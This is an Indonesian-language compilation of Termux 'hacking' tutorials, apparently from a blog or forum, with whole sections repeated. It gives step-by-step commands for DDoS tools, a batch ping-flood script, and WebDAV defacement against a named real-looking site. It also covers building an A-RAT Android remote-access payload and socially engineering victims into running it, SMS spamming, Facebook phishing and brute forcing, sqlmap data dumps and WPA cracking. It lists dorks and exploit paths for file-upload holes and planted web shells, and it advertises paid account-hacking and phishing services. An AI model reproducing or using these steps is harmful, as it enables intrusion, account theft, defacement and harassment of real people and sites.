$ python ipgeolocation.py -h
$ python ipgeolocation.py -t 10.99.110.220
lalu pastekan semua tulisan yg berada di samping Google Maps:
Enjoy

_________
<•Tutorial DDoS Termux•>
_________
$ apt install git
$ pkg install python2
$ git clone https://github.com/mrhidden13/DDoSAttacks.git
$ ls
$ cd DDoSAttacks
$ ls
$ python2 DDoS.py (web yg kalian mau serang)


Sekian🙃

_________
Cara install sungai atau kali linux no root
Cekidoot ':v
_________
clear
pkg update
pkg upgrade
clear
pkg install git
clear
pkg install python2
clear
pkg install gnupg
clear
Pkg install nano
clear
git clone https://github.com/LionSec/katoolin
ls
cd katoolin
ls
python2 katoolin.py
Atau bisa juga
nano katoolin.py

'''''''''''''''''''''''''
DEFACE VIA TERMUX
'''''''''''''''''''''''''
dork :
intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache”
intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:edu
intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:gov
intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:YOURCOUNTRY (misal: my, us, th. dll)
inurl:webdav
inurl:.com.x/*.asp
inurl:.edu.x/*.asp
inurl:.gov.x/*.asp
inurl:.net.x/*.asp
inurl:.org.x/*.asp

tutorial :
buka termux nya....ketik kode di bawah ini

$ apt update && apt upgrade
$ apt install python2
$ pip2 install urllib3 chardet certifi idna requests
$ apt install openssl curl
$ pkg install libcurl
$ mkdir webdav
$ cd webdav
$ wget https://pastebin.com/raw/HnVyQPtR
$ mv HnVyQPtR webdav.py
$ chmod 777 webdav.py


trus kalian buat file script depes kalian di folder webdav tadi

$ termux-setup-storage

Dan berikan hak akses termux untuk mengakses internal hp kalian

pindahkan script deface kalian di penyimpanan folder webdav dengan root explorer di "/data/data/com.termux/files/home/webdav"

atau kalian taru script deface kalian di penyimpanan internal dan jangan di masukkan folder apapun, lalu ketikkan kode di bawah ini

$ cp /sdcard/nama_script.htm ~/webdav



langsung ke cara pakai nya

$ python2 webdav.py (target.cok) (nama sc depes lu)

contoh nya

$ python2 webdav.py http://orders.southeasternfood.com/ depes.

Kurang Paham ? Atau Masih Ragu untuk bertanya ? Ayo Tanyakan :')

Sumber : google.com


/////////////////////////
tutor install x shell
/////////////////////////
$ apt update
$ apt upgrade
$ pkg install python
$ Is
$ cd Lazymux
$ Is
$ python2 Layzmux.py
$ python2 lazymux.py
11
00
$ Is
$ cd Xshell
$ Is
$ chmod 777 install.sh
$ ./install.sh
enjoy



*********
Cara Meretas Android Menggunakan A-RAT
*********
Pertama tama buka dulu termux kalian dan masukan perintah

$ ./ngrok tcp <port yg lo mau>
Contoh :
$ ./ngrok tcp 1337
Kedua kita bikin sesion baru dan Buka Tools A-Rat


Kemudian kita bikin payloadnya dengan perintah berikut

$ set HOST 0.tcp.ngrok.io
$ set PORT <port yg ada di menu ngrok>
Disini gw muncul port 15497 jadi commandnya
$ set PORT 15497
$ set OUTPUT /sdcard/<nama payload yg lo mau>.py
Contoh :
$ set OUTPUT /sdcard/idiotsec.py
$ generate
$ set HOST 127.0.0.1
$ set PORT <port yg tadi lo forwardin>
Contoh :
$ set PORT 1337
$ run

setelah selesai bikin payload tadi, sekarang kamu kirim & socengin orang" biar mau jalanin payload yang udah kalian buat tadi😂 . Kalo udh ada orang yang jalanin payload yang lo bikin maka akan ada tulisan "A-Rat@127.0.0.1:~#"

Setelah itu terserah kalian mau apain android korban yang udah kena RAT dari kalian. disini saya ingin mengecek info kernel hp korban dengan perintah "kernel_info"
Untuk perintah lainya anda bisa megetikan perintah "help" tanpa tanda petik untuk melihat kumpulan command" yang disediakan A-RAT


#############################
SPAM NOMOR TRLEPON VIA TERMUX

#############################
$pkg install php
$pkg install curl
$curl https://pastebin.com/raw/9BYy1JVc -o jdid.php
$ls
$php jdid.php

#isi nomornya mengunakan 628 misalkan nomor saya 085392205092 isinya 6285392205092
#iput ke dua adalah isi jumlah pesan..
#input ketiga adalah isi delay tercepatnya.. delay tercepat bagusnya adalah 1..

sekian dari saya MR.057 jangan di salah gunain..




+++++++++++++++++++++++++
EVAIT SCURITY WEEMAN
+++++++++++++++++++++++++

Termux hacking tools
Catatan:  -y itu jangan ditulis itu dtulis klo ada di suruh seperti pilh [Y/N]
Kita ketik aja y
0 Comments

WEEMAN [✓]

apt update && apt upgrade -y

apt install git -y

apt install python2 -y

git clone https://github.com/evait-security/weeman

cd weeman

chmod 777 weeman.py
python2 weeman.py
Ex
set url http://facebook.com

set action_url http://facebook.com
run

_______________

Hunner framework

apt update

apt install python

apt install git -y

git clone https://github.com/b3-v3r/Hunner

cd Hunner

chmod 777 hunner.py
python hunner.py
_______________

SQLMAP [✓]

apt update

apt install python

apt install python2

apt install git

git clone https://github.com/sqlmapproject/sqlmap

cd sqlmap

Python2 sqlmap.py
___
Exemplo

Python2 sqlmap.py -u website –dbs

-D acuart –tables

-D acuart -T users –columns

-D acuart -T users -C name,email,phone -dump

_____________
BRUTEFORCE [✓]

apt update

apt upgrade

apt install python

apt install pip

pip install wordlist

apt install worlist

Wordlist -h

cd /sdcard

Cat pas.txt
_____________
Localizar ip

Apt install python git

git clone https://github.com/maldevel/IPGeoLocation.git

cd IPGeoLocation

chmod +x ipgeoLocation.py
pip install -r requirements.txt
python ipgeolocation.py -m

python ipgeolocation.py -t http://www.google.com

_____________
Hecker RECONDOG

apt update

apt install python python2

apt install git

git clone https://github.com/UltimateHackers/ReconDog

cd ReconDog

chmod +x dog.py
Python2 dog.py
_____________
BUSCA PAINEL ADM DE SITE

pkg install git

git clone https://github.com/Techzindia/admin_penal

cd admin_penal

chmod +x admin_panel_finder.py
python2 admin_panel_finder.py
_____________
HAKKU

apt install python

apt install git

mkdir vasu

git clone https://github.com/4shadoww/hakkuframework

cd hakkuframework

chmod +x hakku

python hakku

show modules

use whois

show options

set target examplesite.com
run

_______________
RED HAWK

apt update

apt install git

git clone https://github.com/Tuhinshubhra/RED_HAWK

cd RED_HAWK

chmod +x rhawk.php
apt
bahkan
JUAL JASA

SUNTIK KUOTA mulai dari 2GB 3500 - 15GB 10.000

HACK AKUN FB Akun Di Kerjakan dulu baru reward

CREATE WEB PHISING syarat bawa Gmail Fresh

Minat Belajar/jasa!!!!
klik link di bawah!!!

https://api.whatsapp.com/send?phone=+6282133094930&text=MinatBANTU SHARE
Biar Semua Tau Tutorial Berikut
Sedikit nya Membantu Para Pemula

Hack fb cracker

Bahan:apk termux diplaystore hp android versi 5.0



Download file:
Fbbrute.py : http://upvid.mobi/4wz9u6eNniz
Pasword: http://upfile.mobi/CqZSn5e7hwc








$apt update
$apt upgrade
$apt install python2
$apt install python2-dev
$apt install wget
$pip2 install mechanize
$cd /storage/sdcard0
$cd /sdcard
$cd /storage/emulated/0
$python2 fbbrute.py

MASUKAN ID KORBAN
CONTOH (100006541234567)

$/sdcard/password.txt
Hack wifi wpa/wpa2 psk harus root



Download file: https://github.com/esc0rtd3w/wifi-hacker


$apt update
$apt upgrade
$pkg install git
$git clone https://github.com/esc0rtd3w/wifi-hacker
$cd wifi-hacker
$chmod +x wifi-hacker.sh
$./wifi-hacker.sh
Nyalakan wifinya lalu lanjutkan
$y
$2
Sms spammer

Dowload file: https://github.com/Kizukaa/SpammerSMS











$pkg install git
$pkg install python2
$pip2 install requests
$git clone https://github.com/Kizukaa/SpammerSMS
$cd SpammerSMS
________
TUTORIAL install nethunter
________
$ apt update
$ apt install git
$ git clone https://github.com/Hax4us/Nethunter-In-Termux.git
$ cd Nethunter
$ Is
$ chmod +x kalinethunter
$ ./kalinethunter
$ ./startkali.sh
enjoy

_________
TUTORIAL melacak secara detail
_________
$ apt update
$ apt upgrade
$ pkg install python
$ pkg install git
$ git clone https://github.com/maldevel/IPGeoLocation
$ Is
$ cd IPGeoLocation
$ is
$ chmod +x ipgeolocation.py
$ Is
$ pip install -r repuirements.txt
$ python ipgeolocation.py -m
$ python ipgeolocation.py -h
$ python ipgeolocation.py -t 10.99.110.220
lalu pastekan semua tulisan yg berada di samping Google Maps:
Enjoy

_________
<•Tutorial DDoS Termux•>
_________
$ apt install git
$ pkg install python2
$ git clone https://github.com/mrhidden13/DDoSAttacks.git
$ ls
$ cd DDoSAttacks
$ ls
$ python2 DDoS.py (web yg kalian mau serang)


Sekian🙃

_________
Cara install sungai atau kali linux no root
Cekidoot ':v
_________
clear
pkg update
pkg upgrade
clear
pkg install git
clear
pkg install python2
clear
pkg install gnupg
clear
Pkg install nano
clear
git clone https://github.com/LionSec/katoolin
ls
cd katoolin
ls
python2 katoolin.py
Atau bisa juga
nano katoolin.py

'''''''''''''''''''''''''
DEFACE VIA TERMUX
'''''''''''''''''''''''''
dork :
intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache”
intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:edu
intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:gov
intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:YOURCOUNTRY (misal: my, us, th. dll)
inurl:webdav
inurl:.com.x/*.asp
inurl:.edu.x/*.asp
inurl:.gov.x/*.asp
inurl:.net.x/*.asp
inurl:.org.x/*.asp

tutorial :
buka termux nya....ketik kode di bawah ini

$ apt update && apt upgrade
$ apt install python2
$ pip2 install urllib3 chardet certifi idna requests
$ apt install openssl curl
$ pkg install libcurl
$ mkdir webdav
$ cd webdav
$ wget https://pastebin.com/raw/HnVyQPtR
$ mv HnVyQPtR webdav.py
$ chmod 777 webdav.py


trus kalian buat file script depes kalian di folder webdav tadi

$ termux-setup-storage

Dan berikan hak akses termux untuk mengakses internal hp kalian

pindahkan script deface kalian di penyimpanan folder webdav dengan root explorer di "/data/data/com.termux/files/home/webdav"

atau kalian taru script deface kalian di penyimpanan internal dan jangan di masukkan folder apapun, lalu ketikkan kode di bawah ini

$ cp /sdcard/nama_script.htm ~/webdav



langsung ke cara pakai nya

$ python2 webdav.py (target.cok) (nama sc depes lu)

contoh nya

$ python2 webdav.py http://orders.southeasternfood.com/ depes.

Kurang Paham ? Atau Masih Ragu untuk bertanya ? Ayo Tanyakan :')

Sumber : google.com


/////////////////////////
tutor install x shell
/////////////////////////
$ apt update
$ apt upgrade
$ pkg install python
$ Is
$ cd Lazymux
$ Is
$ python2 Layzmux.py
$ python2 lazymux.py
11
00
$ Is
$ cd Xshell
$ Is
$ chmod 777 install.sh
$ ./install.sh
enjoy



*********
Cara Meretas Android Menggunakan A-RAT
*********
Pertama tama buka dulu termux kalian dan masukan perintah

$ ./ngrok tcp <port yg lo mau>
Contoh :
$ ./ngrok tcp 1337
Kedua kita bikin sesion baru dan Buka Tools A-Rat


Kemudian kita bikin payloadnya dengan perintah berikut

$ set HOST 0.tcp.ngrok.io
$ set PORT <port yg ada di menu ngrok>
Disini gw muncul port 15497 jadi commandnya
$ set PORT 15497
$ set OUTPUT /sdcard/<nama payload yg lo mau>.py
Contoh :
$ set OUTPUT /sdcard/idiotsec.py
$ generate
$ set HOST 127.0.0.1
$ set PORT <port yg tadi lo forwardin>
Contoh :
$ set PORT 1337
$ run

setelah selesai bikin payload tadi, sekarang kamu kirim & socengin orang" biar mau jalanin payload yang udah kalian buat tadi😂 . Kalo udh ada orang yang jalanin payload yang lo bikin maka akan ada tulisan "A-Rat@127.0.0.1:~#"

Setelah itu terserah kalian mau apain android korban yang udah kena RAT dari kalian. disini saya ingin mengecek info kernel hp korban dengan perintah "kernel_info"
Untuk perintah lainya anda bisa megetikan perintah "help" tanpa tanda petik untuk melihat kumpulan command" yang disediakan A-RAT


#############################
SPAM NOMOR TRLEPON VIA TERMUX

#############################
$pkg install php
$pkg install curl
$curl https://pastebin.com/raw/9BYy1JVc -o jdid.php
$ls
$php jdid.php

#isi nomornya mengunakan 628 misalkan nomor saya 085392205092 isinya 6285392205092
#iput ke dua adalah isi jumlah pesan..
#input ketiga adalah isi delay tercepatnya.. delay tercepat bagusnya adalah 1..

sekian dari saya MR.057 jangan di salah gunain..




+++++++++++++++++++++++++
EVAIT SCURITY WEEMAN
+++++++++++++++++++++++++

Termux hacking tools
Catatan:  -y itu jangan ditulis itu dtulis klo ada di suruh seperti pilh [Y/N]
Kita ketik aja y
0 Comments

WEEMAN [✓]

apt update && apt upgrade -y

apt install git -y

apt install python2 -y

git clone https://github.com/evait-security/weeman

cd weeman

chmod 777 weeman.py
python2 weeman.py
Ex
set url http://facebook.com

set action_url http://facebook.com
run

_______________

Hunner framework

apt update

apt install python

apt install git -y

git clone https://github.com/b3-v3r/Hunner

cd Hunner

chmod 777 hunner.py
python hunner.py
_______________

SQLMAP [✓]

apt update

apt install python

apt install python2

apt install git

git clone https://github.com/sqlmapproject/sqlmap

cd sqlmap

Python2 sqlmap.py
___
Exemplo

Python2 sqlmap.py -u website –dbs

-D acuart –tables

-D acuart -T users –columns

-D acuart -T users -C name,email,phone -dump

_____________
BRUTEFORCE [✓]

apt update

apt upgrade

apt install python

apt install pip

pip install wordlist

apt install worlist

Wordlist -h

cd /sdcard

Cat pas.txt
_____________
Localizar ip

Apt install python git

git clone https://github.com/maldevel/IPGeoLocation.git

cd IPGeoLocation

chmod +x ipgeoLocation.py
pip install -r requirements.txt
python ipgeolocation.py -m

python ipgeolocation.py -t http://www.google.com

_____________
Hecker RECONDOG

apt update

apt install python python2

apt install git

git clone https://github.com/UltimateHackers/ReconDog

cd ReconDog

chmod +x dog.py
Python2 dog.py
_____________
BUSCA PAINEL ADM DE SITE

pkg install git

git clone https://github.com/Techzindia/admin_penal

cd admin_penal

chmod +x admin_panel_finder.py
python2 admin_panel_finder.py
_____________
HAKKU

apt install python

apt install git

mkdir vasu

git clone https://github.com/4shadoww/hakkuframework

cd hakkuframework

chmod +x hakku

python hakku

show modules

use whois

show options

set target examplesite.com
run

_______________
RED HAWK

apt update

apt install git

git clone https://github.com/Tuhinshubhra/RED_HAWK

cd RED_HAWK

chmod +x rhawk.php
apt
bahkan 

ASLI DAN TERPERCAYA :CARA MEMBUAT PROGRAM DDOS DI CMD

COPY KAN PERINTAH DIBAWAH INI DI NOTEPAD
 LALU SIMPAN DENGAN FORMAT .BAT


@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo
echo DDOS With Batchfile
echo
echo.
set /p x=Server-Target:
echo.
echo
ping %x%
echo
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
DOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

ASLI DAN TERPERCAYA :TUTORIAL DEFACE METODE Poc Kindeditor

Poc Kindeditor

Dork :
- inurl:kindeditor
- inurl:/example/uploadbuttom.html
Path :  Stlh upload file-nya jga nanti akan ada path-nya


Poc Fckeditor

Dork :
- inurl:/filemanager/upload/test.html
- inurl:advert_detail.php?id=
- inurl:/html/siswa.php?
- inurl:/html/alumni.php?
- inurl:/html/guru.php?
Exploit :
- /editor/filemanager/connectors/test.html
- /admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
Path :
- Stlh upload file-nya jga nanti akan ada path-nya
- site.com/file/ahhhh.html
- target.co.uk/userfiles/file/tod.txt
Note : Gunakan Exploit jika diperlukan & Tdk semua web vuln untuk upload file ber-ext (".html")

Poc Webdav

Dork :
- intitle:鈥漣ndex.of鈥�
- intext:鈥�(Win32) DAV/2鈥�
- intext:鈥滱pache鈥�
- intitle:鈥漣ndex.of鈥�
- intext:鈥�(Win32) DAV/2鈥�
- intext:鈥滱pache鈥� site:edu
- intitle:鈥漣ndex.of鈥�
- intext:鈥�(Win32) DAV/2鈥�
- intext:鈥滱pache鈥� site:gov
- intitle:鈥漣ndex.of鈥�
- intext:鈥�(Win32) DAV/2鈥�
- intext:鈥滱pache鈥� site:com
- inurl:webdav
- inurl:.com.x/*.asp
- inurl:.edu.x/*.asp
- inurl:.gov.x/*.asp
- inurl:.net.x/*.asp
- inurl:.org.x/*.asp
Path : site.com/tai.html


Poc Drupal Hidden Uploader

Dork : Allowed filetype html site:com
Path : Klik nama file yg tlh diupload tadi
Note : Tdk semua web vuln untuk upload file ber-ext (".html")


Poc Sitefinity

Dork : inurl:"sitefinity/login.aspx
Exploit : /sitefinity/usercontrols/dialog/documenteditordialog.aspx
Path : http://sitetarget.com/files/jancok.html
Note : Tdk semua web vuln untuk upload file ber-ext (".html")


Poc KCFinder

Inurl:/kcfinder/browse.php
Path : 
- target.com/file/hime.html
- target.com/file/[dir]/hime.html
Note : Bisa upload shell jga, tpi tdk semua web


Deface Onion.to File Upload

Dork :
- inurl:/upload site:.onion.to
- intext:"Upload" site:.onion.to
Path : site.com/uploads/mpsh.html


Poc com media + CSRF

Dork :
- inurl:com_media site:com
- inurl:com_media intext:"Upload"
Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
Path : vuln.com/images/namafile.txt


Poc Board Forum

Dork :
- inurl:"/forum_topic_create.php?"
- inurl:"/forum.php?forumid=
Path : Klik nama file yg tlh diupload tadi


Poc Exploit FileChucker File Upload

Dork :
- inurl:/cgi-bin/filechucker.cgi
- intext:Toptown File Upload
- inurl:/cgi-bin/filechucker.pl
- intext:File Upload by Encodable
Path : target.org/[dir yg ada dikolom]/nama.html
Note : Tdk semua web vuln untuk upload file yg ber-ext (".html")


Poc phUploader

Dork : intitle:"Powered by phUploader" intext:"txt"
Path : Stlh upload file-nya jga nanti akan ada path-nya


Poc Com_Fabrik

Dork :
- inurl:com_fabrik site:go.id (With CSRF)
- inurl:viewTable?cid= site:com
- inurl:index.php?option=com_fabrik
- inurl:index.php/component/fabrik/ site:
- inurl:index.php?option=com_fabrik&view= site:
- inurl:importcsv.php site:
Exploit :
- /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload (With CSRF)
- /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
- /index.php?option=com_fabrik&amp;c=import&amp;view=import&amp;filetype=csv&amp;tableid=1echercher
Path :
- target.go.id/file.html (With CSRF + Upload Script ber-ext (".html"))
- tebas.go.id (With CSRF + Upload (".htaccess") + Upload Script ber-ext (".html"))
- site.go.id/media/shell.php
Note : Tdk semua web vuln untuk upload shell


Poc Spaw File Manager

Dork :
- inurl:Spaw2/dialogs/
- inurl:spaw2/uploads/files
- index of:/Spaw2/uploads/files
Exploit : /spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=
Path : vuln.com/spaw2/upload/files/script.html
Note :  Tdk semua web vuln untuk upload file yg ber-ext (".html")


Poc Dorking Shell

Dork :
- inurl:/images/ intitle:sh3ll ext:php
- intitle:sh3ll ext:php "/public_html/"
- intitle:"IndoXploit" filetype:php # intitle:"IndoXploit" intext:"public_html" filetype:php 
- intitle:"IndoXploit" intext:"mass deface" filetype:php 
- intitle:"IndoXploit" intext:"mass delete" filetype:php 
- intitle:"IndoXploit" intext:"jumping" filetype:php 
- intitle:"IndoXploit" intext:"config" filetype:php 
- intitle:"IndoXploit" intext:"config" filetype:php 
- intitle:"IndoXploit" intext:"fake root" filetype:php 
- intitle:"IndoXploit" intext:"auto edit user" filetype:php 
- intitle:"IndoXploit" intext:"Auto Edit Title WordPress" filetype:php 
- intitle:"IndoXploit" intext:"WordPress Auto Deface" filetype:php 
- intitle:"IndoXploit" intext:"WordPress Auto Deface V.2" filetype:php 
- intitle:"IndoXploit" intext:"CPanel/FTP Auto Deface" filetype:php 
- intitle:"IndoXploit" intext:"cpanel crack" filetype:php 
- intitle:"IndoXploit" intext:"Adminer" filetype:php 
- intitle:"IndoXploit" intext:"SMTP Grabber" filetype:php 
- intitle:"IndoXploit" intext:"Zone-h" filetype:php 
- intitle:"IndoXploit" intext:"CGI Telnet" filetype:php 
- intitle:"IndoXploit" intext:"network" filetype:php 
- intitle:"IndoXploit" intext:"K-RDP Shell " filetype:php 
- intitle:"IndoXploit" intext:"newfile | newfolder" filetype:php 
- inurl:"/wp-content/" intitle:"IndoXploit" filetype:php 
- inurl:"/wp-content/" intitle:"b374k" filetype:php 
- inurl:"/wp-content/" intitle:"b374k m1n1" filetype:php 
- inurl:"/wp-content/" intitle:"Shell" filetype:php 
- inurl:"/wp-content/" intitle:"Stupidc0de" filetype:php 
- intitle:"1n73ction" filetype:php 
- intext:"Cpanel Cracker" filetype:php 
- intext:"Current DIR: /home/" filetype:php 
- intext:"IndoXploit" filetype:php 
- intitle:"c99" intext:"public_html" filetype:php


Poc Pro Taxi

Dork :
- inurl:/user/signin intext:SIGN IN NOW
- inurl:public/user/signup
Path : tolol.com/shell.php5
Note : Tdk semua web vuln untuk upload shell